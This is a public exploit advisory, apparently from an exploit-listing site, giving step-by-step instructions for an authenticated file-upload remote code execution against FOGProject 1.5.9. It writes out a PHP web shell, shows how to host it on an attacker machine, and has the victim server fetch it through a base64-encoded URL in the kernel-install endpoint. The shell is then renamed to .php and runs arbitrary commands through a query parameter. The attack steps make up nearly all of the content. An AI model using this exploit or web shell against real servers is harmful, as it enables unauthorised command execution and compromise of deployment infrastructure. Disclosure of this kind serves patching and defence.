FOGProject 1.5.9 File Upload RCE (Authenticated)

2021.04.29
Credit: sml@lacashita.com
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: FOGProject 1.5.9 - File Upload RCE (Authenticated) # Date: 2021-04-28 # Exploit Author: sml@lacashita.com # Vendor Homepage: https://fogproject.org # Software Link: https://github.com/FOGProject/fogproject/archive/1.5.9.zip # Tested on: Debian 10 On the Attacker Machine: 1) Create an empty 10Mb file. dd if=/dev/zero of=myshell bs=10485760 count=1 2) Add your PHP code to the end of the file created in the step 1. echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell 3) Put the file "myshell" accessible through HTTP. $ cp myshell /var/www/html 4) Encode the URL to get "myshell" file to base64 (Replacing Attacker IP). $ echo "http://ATTACKER_IP/myshell" | base64 aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo= 5) Visit http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<YOUR_MYSHELL_URL_HERE>=&arch=arm64 Example: http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=&arch=arm64 6) Appears a textbox, change the Kernel Name (bzImage32) to myshell.php and click on Install. 7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=hostname


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top